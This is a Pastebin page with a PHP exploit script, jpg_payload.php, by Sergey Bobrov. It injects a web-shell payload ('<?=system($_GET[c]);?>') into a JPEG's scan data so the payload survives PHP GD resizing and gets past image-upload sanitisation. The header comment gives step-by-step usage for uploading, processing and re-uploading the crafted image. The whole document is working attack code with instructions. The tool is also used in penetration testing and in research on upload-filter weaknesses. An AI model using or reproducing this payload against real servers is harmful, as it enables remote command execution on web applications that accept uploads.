Advertisement
BlackFan

jpg_payload.php

Jul 2nd, 2013
7,487
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 4.68 KB | None | 0 0
  1. <?php
  2.     /*
  3.  
  4.     The algorithm of injecting the payload into the JPG image, which will keep unchanged after transformations
  5.     caused by PHP functions imagecopyresized() and imagecopyresampled().
  6.     It is necessary that the size and quality of the initial image are the same as those of the processed
  7.     image.
  8.  
  9.     1) Upload an arbitrary image via secured files upload script
  10.     2) Save the processed image and launch:
  11.     php jpg_payload.php <jpg_name.jpg>
  12.  
  13.     In case of successful injection you will get a specially crafted image, which should be uploaded again.
  14.  
  15.     Since the most straightforward injection method is used, the following problems can occur:
  16.     1) After the second processing the injected data may become partially corrupted.
  17.     2) The jpg_payload.php script outputs "Something's wrong".
  18.     If this happens, try to change the payload (e.g. add some symbols at the beginning) or try another
  19.     initial image.
  20.  
  21.     Sergey Bobrov @Black2Fan.
  22.  
  23.     See also:
  24.     https://www.idontplaydarts.com/2012/06/encoding-web-shells-in-png-idat-chunks/
  25.  
  26.     */
  27.  
  28.     $miniPayload = '<?=system($_GET[c]);?>';
  29.  
  30.     if(!extension_loaded('gd') || !function_exists('imagecreatefromjpeg')) {
  31.         die('php-gd is not installed');
  32.     }
  33.    
  34.     if(!isset($argv[1])) {
  35.         die('php jpg_payload.php <jpg_name.jpg>');
  36.     }
  37.  
  38.     set_error_handler("custom_error_handler");
  39.  
  40.     for($pad = 0; $pad < 1024; $pad++) {
  41.         $nullbytePayloadSize = $pad;
  42.         $dis = new DataInputStream($argv[1]);
  43.         $outStream = file_get_contents($argv[1]);
  44.         $extraBytes = 0;
  45.         $correctImage = TRUE;
  46.  
  47.         if($dis->readShort() != 0xFFD8) {
  48.             die('Incorrect SOI marker');
  49.         }
  50.  
  51.         while((!$dis->eof()) && ($dis->readByte() == 0xFF)) {
  52.             $marker = $dis->readByte();
  53.             $size = $dis->readShort() - 2;
  54.             $dis->skip($size);
  55.             if($marker === 0xDA) {
  56.                 $startPos = $dis->seek();
  57.                 $outStreamTmp =
  58.                     substr($outStream, 0, $startPos) .
  59.                     $miniPayload .
  60.                     str_repeat("\0",$nullbytePayloadSize) .
  61.                     substr($outStream, $startPos);
  62.                 checkImage('_'.$argv[1], $outStreamTmp, TRUE);
  63.                 if($extraBytes !== 0) {
  64.                     while((!$dis->eof())) {
  65.                         if($dis->readByte() === 0xFF) {
  66.                             if($dis->readByte !== 0x00) {
  67.                                 break;
  68.                             }
  69.                         }
  70.                     }
  71.                     $stopPos = $dis->seek() - 2;
  72.                     $imageStreamSize = $stopPos - $startPos;
  73.                     $outStream =
  74.                         substr($outStream, 0, $startPos) .
  75.                         $miniPayload .
  76.                         substr(
  77.                             str_repeat("\0",$nullbytePayloadSize).
  78.                                 substr($outStream, $startPos, $imageStreamSize),
  79.                             0,
  80.                             $nullbytePayloadSize+$imageStreamSize-$extraBytes) .
  81.                                 substr($outStream, $stopPos);
  82.                 } elseif($correctImage) {
  83.                     $outStream = $outStreamTmp;
  84.                 } else {
  85.                     break;
  86.                 }
  87.                 if(checkImage('payload_'.$argv[1], $outStream)) {
  88.                     die('Success!');
  89.                 } else {
  90.                     break;
  91.                 }
  92.             }
  93.         }
  94.     }
  95.     unlink('payload_'.$argv[1]);
  96.     die('Something\'s wrong');
  97.  
  98.     function checkImage($filename, $data, $unlink = FALSE) {
  99.         global $correctImage;
  100.         file_put_contents($filename, $data);
  101.         $correctImage = TRUE;
  102.         imagecreatefromjpeg($filename);
  103.         if($unlink)
  104.             unlink($filename);
  105.         return $correctImage;
  106.     }
  107.  
  108.     function custom_error_handler($errno, $errstr, $errfile, $errline) {
  109.         global $extraBytes, $correctImage;
  110.         $correctImage = FALSE;
  111.         if(preg_match('/(\d+) extraneous bytes before marker/', $errstr, $m)) {
  112.             if(isset($m[1])) {
  113.                 $extraBytes = (int)$m[1];
  114.             }
  115.         }
  116.     }
  117.  
  118.     class DataInputStream {
  119.         private $binData;
  120.         private $order;
  121.         private $size;
  122.  
  123.         public function __construct($filename, $order = false, $fromString = false) {
  124.             $this->binData = '';
  125.             $this->order = $order;
  126.             if(!$fromString) {
  127.                 if(!file_exists($filename) || !is_file($filename))
  128.                     die('File not exists ['.$filename.']');
  129.                 $this->binData = file_get_contents($filename);
  130.             } else {
  131.                 $this->binData = $filename;
  132.             }
  133.             $this->size = strlen($this->binData);
  134.         }
  135.  
  136.         public function seek() {
  137.             return ($this->size - strlen($this->binData));
  138.         }
  139.  
  140.         public function skip($skip) {
  141.             $this->binData = substr($this->binData, $skip);
  142.         }
  143.  
  144.         public function readByte() {
  145.             if($this->eof()) {
  146.                 die('End Of File');
  147.             }
  148.             $byte = substr($this->binData, 0, 1);
  149.             $this->binData = substr($this->binData, 1);
  150.             return ord($byte);
  151.         }
  152.  
  153.         public function readShort() {
  154.             if(strlen($this->binData) < 2) {
  155.                 die('End Of File');
  156.             }
  157.             $short = substr($this->binData, 0, 2);
  158.             $this->binData = substr($this->binData, 2);
  159.             if($this->order) {
  160.                 $short = (ord($short[1]) << 8) + ord($short[0]);
  161.             } else {
  162.                 $short = (ord($short[0]) << 8) + ord($short[1]);
  163.             }
  164.             return $short;
  165.         }
  166.  
  167.         public function eof() {
  168.             return !$this->binData||(strlen($this->binData) === 0);
  169.         }
  170.     }
  171. ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement